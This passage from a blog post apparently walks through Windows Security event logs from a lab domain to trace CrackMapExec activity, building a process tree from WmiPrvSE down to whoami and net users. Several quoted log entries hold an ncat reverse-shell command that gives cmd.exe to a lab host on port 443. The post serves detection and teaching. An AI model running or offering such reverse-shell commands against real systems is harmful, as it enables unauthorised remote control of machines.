Ahhhh! Finally, we are able to see above the command which was executed. It took us a while to get here but we did. No need to worry about the spaces between the characters. This is because this is Unicode or 2 bytes (16 bits) values.
Finally we see the account logoff for logon ID "0xB48AC1"
04/18/2019 01:33:01 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172622 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Logon Type: 3
Good stuff! We solved that challenge.
Let's move on to the last part of this post. As we look at this last part in which "ncat.exe" was executed, let's see what we might be able to learn from them. As we go through this section, note I'm leaving out some of the activiies as it similar to what we have seen above. As in for example accessing the share "\\*\C$" as well as creating and deleting temporary files such as "Windows\Temp\HxuzLk" and having process command lines such as "cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\HxuzLk 2>&1". Rather than repeat what is above, let's instead focus on the more relevant items.
We see below that similar to the Powershell command, when the "netcat.exe" is executed below, it
04/18/2019 11:09:49 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196801 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x426A10 Process Information: New Process ID: 0x8a8 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x1164 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\iKxsfQ 2>&1
At this point, since we have the log above, we are better off taking the logon ID "0x426A10" and search for all activities associated with it. However, when I did this I did not find the "whoami" and "net users" log entries. As a result, I had to continue stepping through my logs looking at the activities after the time above. As I stepped through, I recognized there are a number of logon and logoff that would have resulted in me not seeing the "whoami" under this session as every new session should generate a new logon ID. However, these logons still all display similar characteristics with the access they request and the files they create.
As I stepped through the logs, I recognize I hit the jackpot. Let's walk through this.
The next log is where it all begins. Let's build our tree.
From below, the "cmd.exe" process with PID "0xb94" was created by the "WmiPrvSE.exe" process with PID "0x1bc". The "cmd.exe" process has quite an interesting command line.
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196910 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Process Information: New Process ID: 0xb94 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x1bc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1
As we look at the next log entry seen below that "cmd.exe" with PID (0xb94) has spawned "connhost.exe" with PID "0xb4"
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196911 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xb4 New Process Name: C:\Windows\System32\conhost.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb94 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Continuing our log analysis, we see below that the "cmd.exe" process with PID "0xb94" now spawns "c:\tools\ncat.exe" with PID "0x9e8". We can also see the "ncat.exe" connecting to a device at 10.0.0.100 on port 443. Interesting!
-> ncat.exe (0x9e8) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196919 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x9e8 New Process Name: C:\Tools\ncat.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb94 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443
Next we see the "ncat.exe" process with PID "0x9e8" spawing a shell "cmd.exe" with PID "0xb4c".
-> ncat.exe (0x9e8) -> cmd.exe (0x4bc) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196925 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xb4c New Process Name: C:\Windows\SysWOW64\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x9e8 Creator Process Name: C:\Tools\ncat.exe Process Command Line: cmd.exe
Looking below, we now see a "cmd.exe" process with PID "0xb4c" spawing a process named "whoami.exe" with PID "0xe60"
-> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:48 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196959 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xe60 New Process Name: C:\Windows\SysWOW64\whoami.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:\Windows\SysWOW64\cmd.exe Process Command Line: whoami
Next up we see below, the "cmd.exe" process with PID "0x4bc" exeuting the "net.exe" process with PID "0x1360" Notice the command line for this is executing "net users".
-> net.exe (0x1360) / -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60) start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:55 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196966 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x13f0 New Process Name: C:\Windows\SysWOW64\net.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:\Windows\SysWOW64\cmd.exe Process Command Line: net users
Finally, we see "net.exe" process with PID "0x13f0" spawning the "net1.exe" process with PID "0x570"
-> net.exe (0x1360) -> net1.exe (0x570) / -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:55 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196967 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x570 New Process Name: C:\Windows\SysWOW64\net1.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x13f0 Creator Process Name: C:\Windows\SysWOW64\net.exe Process Command Line: C:\Windows\system32\net1 users
Ok! So now we have a reasonable amount of intelligence into how we can use our logs to see the activity crackmapexec performs on a system. obviously, you will need to have the appropriate level of logging in place to be able to make the most out of this.
See the rests of the posts below on how we do raw packet analsis leveraging "tshark", along with using tools such as Snort and Bro ... sorry Zeek.
References:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4661
https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter7
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661
https://docs.microsoft.com/en-us/windows/desktop/ADSchema/attributes-all
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/177c0db5-fa12-4c31-b75a-473425ce9cca
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/ac2852b7-cbca-4495-8e66-74fa34bcff59
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/a499e86b-daa7-463c-bf3a-f052560b0ccf
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145
https://www.morgantechspace.com/2013/10/Event-ID-5145-Detailed-File-Share-Auditing.html
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis
No comments:
Post a Comment